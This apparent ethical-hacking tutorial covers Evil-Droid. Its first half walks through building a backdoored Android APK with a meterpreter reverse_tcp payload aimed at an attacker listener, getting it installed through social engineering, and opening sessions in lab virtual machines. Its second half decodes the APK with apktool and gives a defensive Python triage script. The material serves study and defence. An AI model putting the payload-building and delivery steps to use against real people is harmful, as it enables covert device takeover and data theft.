Android is an open-source platform on which any developer can turn an idea into an application. That is a big advantage for developers and for users, who can pick from a huge number of applications, but it also makes Android a frequent target. Android has had many vulnerabilities that give an attacker a way to steal a target's credentials. The CVE (Common Vulnerabilities and Exposures) list records many Android vulnerabilities that can be used to bypass Android's security, as demonstrated in the ethical hacking courses offered by the International Institute of Cyber Security.

CVE lists many vulnerabilities that attackers commonly use. Today we will show a tool called Evil-Droid, which generates different payloads to compromise an Android device. Ethical hacking researchers of the International Institute of Cyber Security note that Evil-Droid generates a malicious APK (a backdoored app) which, once installed and opened on the target device, connects back to the attacker's Metasploit listener.
- Evil-Droid was installed on Kali Linux 2018.4 amd64.
- To clone it, type git clone https://github.com/M4sc3r4n0/Evil-Droid.git
- Type cd Evil-Droid
- Type chmod u+x evil-droid
- Type ./evil-droid

======================SNIP========================

- Type 1 to start APK MSF (build an APK that carries a Metasploit payload)
- Type the local IP address (the attacker's IP address), here 192.168.1.5
- Type the port number to listen on, here 4444
- Type a name for the malicious APK, here testapk
- Select android/meterpreter/reverse_tcp
- Select Multi handler
- Then click OK

- Evil-Droid has now created the malicious app. Deliver it to the target by social engineering: the APK has to be installed and launched by the user, it does not exploit a vulnerability on its own.
- For testing we used an Android 4.4 ISO, downloaded from: https://sourceforge.net/projects/android-x86/files/latest/download
- We live-booted it in VMware Workstation.
- Install the malicious test APK into Android 4.4.
- Before installing, Android asks you to allow installation from unknown sources. Turn on Unknown sources and then install test.apk.

- Open test.apk on the Android device.
- A session is created in the Evil-Droid listener. Another terminal opens automatically to create and run the session.
- The Evil-Droid meterpreter offers the same commands as the Metasploit meterpreter, so you can easily manipulate the target.
- For a second test we used an Android 7.1 ISO, downloaded from: https://osdn.net/projects/android-x86/downloads/67834/android-x86_64-7.1-r2.iso/
- We live-booted it in VMware Workstation.
- Install the malicious test APK into Android 7.1.
- Before installing, Android asks you to allow installation from unknown sources. Turn on Unknown sources and then install test.apk.
- Open test.apk on the Android device.
- A session is created in the Evil-Droid listener.
- Another terminal opens automatically to create and run the session.
- The Evil-Droid meterpreter offers the same commands as the Metasploit meterpreter, so you can easily manipulate the target.
The same attack on Android devices can be carried out with FatRat; to understand how it works, follow the step-by-step tutorial on hacking Windows, Android and Mac using FatRat.
REVERSING MALICIOUS APK GENERATED BY EVIL-DROID:-
Various tools are used to decode APKs for reverse engineering, according to ethical hacking experts, but the most popular is apktool, which unpacks an APK, decodes its binary resources and AndroidManifest.xml, and disassembles the Dalvik bytecode in classes.dex into smali. We used apktool, which comes pre-installed on Kali Linux 2018.4 (amd64).
- Open another terminal and type apktool -h (apktool has no -h option, but it prints its usage anyway):
root@kali:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com/jpzqkxcarh/zsehpukvxy# apktool -h
Unrecognized option: -h
Apktool v2.2.2 - a tool for reengineering Android apk files
with smali v2.1.3 and baksmali v2.1.3
Copyright 2014 Ryszard Wiśniewski [email protected]
Updated by Connor Tumbleson [email protected]
usage: apktool
-advance,--advanced prints advance information.
-version,--version prints the version then exits
usage: apktool if|install-framework [options]
-p,--frame-path
Stores framework files into .
-t,--tag Tag frameworks using .
usage: apktool d[ecode] [options]
-f,--force Force delete destination directory.
- Type apktool d evil.apk
root@kali:/home/iicybersecurity/Downloads/Evil-Droid# apktool d evil.apk
I: Using Apktool 2.2.2 on evil.apk
I: Loading resource table…
I: Decoding AndroidManifest.xml with resources…
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package…
I: Decoding file-resources…
I: Decoding values */* XMLs…
I: Baksmaling classes.dex…
I: Copying assets and libs…
I: Copying unknown files…
I: Copying original files…
- After the command above, apktool has unpacked the malicious APK into a directory (evil/) containing the decoded AndroidManifest.xml, the resource XMLs and the smali disassembly of classes.dex. These are the files a forensic analyst reads.
- Looking further, we found that the malicious APK's code lives in directories with jumbled, random-looking names (a package name such as com.jpzqkxcarh.zsehpukvxy). A normal application does not usually use such names, since package names are chosen by developers and normally reflect a company or product. This is a useful indicator but only a heuristic: confirm it by reading AndroidManifest.xml for the permissions the app requests and the smali for the code that connects back to the listener.
root@kali:/home/iicybersecurity/Downloads/Evil-Droid# cd evil/smali/com
root@kali:/home/iicybersecurity/Downloads/Evil-Droid/evil/smali/com# ls
jpzqkxcarh
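To turn the observation above into a repeatable check, here is an added Python triage script (example code written for this article; it is not part of Evil-Droid, Metasploit or apktool). It reads an apktool output directory such as evil/, flags random-looking package segments in the manifest and under smali/ with a simple vowel/consonant heuristic, and lists sensitive permissions the app requests. The two sample manifests and the permission list are constructed assumptions, and the heuristic will also flag some legitimate but vowel-poor names, so treat a hit as a prompt to read the smali, not as proof.

```python
"""Triage an apktool-decoded APK for msfvenom-style indicators.

Added example for this article, not code from Evil-Droid, Metasploit or
apktool. Heuristics: random-looking package directories under smali/ (the
article's observation) and a permission set wider than a launcher-only app
needs. Both manifests below are constructed samples, not from a real APK.
"""
import json
import os
import re
import sys
import tempfile
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions a meterpreter-style spyware payload wants. Assumption: a subset
# of what android/meterpreter requests; the exact list differs by version.
SENSITIVE_PERMISSIONS = {
    "android.permission." + p for p in (
        "READ_SMS", "SEND_SMS", "RECEIVE_SMS", "RECORD_AUDIO", "CAMERA",
        "READ_CONTACTS", "READ_CALL_LOG", "ACCESS_FINE_LOCATION",
        "READ_PHONE_STATE", "RECEIVE_BOOT_COMPLETED",
    )
}

# Constructed sample: roughly what a decoded Evil-Droid manifest looks like.
MSF_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.jpzqkxcarh.zsehpukvxy">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application android:label="MainActivity">
    <activity android:name="com.jpzqkxcarh.zsehpukvxy.MainActivity"/>
  </application>
</manifest>"""

# Constructed sample: an ordinary app that only needs network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>"""

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[^aeiou0-9_]{4,}")


def segment_looks_random(seg):
    """Heuristic: almost no vowels, or a run of four or more consonants
    (jpzqkxcarh, zsehpukvxy), rather than a word (metasploit, example)."""
    s = seg.lower()
    if len(s) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in s) / len(s)
    return vowel_ratio < 0.2 or CONSONANT_RUN.search(s) is not None


def triage_manifest(xml_text):
    """Check the package name and requested permissions in AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    requested = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    random_segments = [s for s in package.split(".") if segment_looks_random(s)]
    sensitive = sorted(requested & SENSITIVE_PERMISSIONS)
    return {
        "package": package,
        "random_segments": random_segments,
        "sensitive_permissions": sensitive,
        "suspicious": bool(random_segments) or len(sensitive) >= 4,
    }


def triage_decoded_dir(path):
    """Run the manifest checks on an apktool output directory and list the
    random-looking directories under smali/, as the article did with ls."""
    with open(os.path.join(path, "AndroidManifest.xml"), encoding="utf-8") as f:
        report = triage_manifest(f.read())
    smali = os.path.join(path, "smali")
    random_dirs = []
    for dirpath, dirnames, _ in os.walk(smali):
        for d in dirnames:
            if segment_looks_random(d):
                rel = os.path.relpath(os.path.join(dirpath, d), smali)
                random_dirs.append(rel.replace(os.sep, "/"))
    report["random_smali_dirs"] = sorted(random_dirs)
    report["suspicious"] = report["suspicious"] or bool(random_dirs)
    return report


def demo():
    """Build a constructed decoded directory in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "smali", "com", "jpzqkxcarh", "zsehpukvxy"))
        with open(os.path.join(tmp, "AndroidManifest.xml"), "w", encoding="utf-8") as f:
            f.write(MSF_MANIFEST)
        return triage_decoded_dir(tmp)


if __name__ == "__main__":
    # Usage: python triage_apk.py evil/   (with no argument, runs the demo)
    report = triage_decoded_dir(sys.argv[1]) if len(sys.argv) > 1 else demo()
    print(json.dumps(report, indent=2))
```

Run it against the evil/ directory that apktool created; the JSON report names the random-looking directories and the sensitive permissions so they can be pasted straight into a forensic note.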
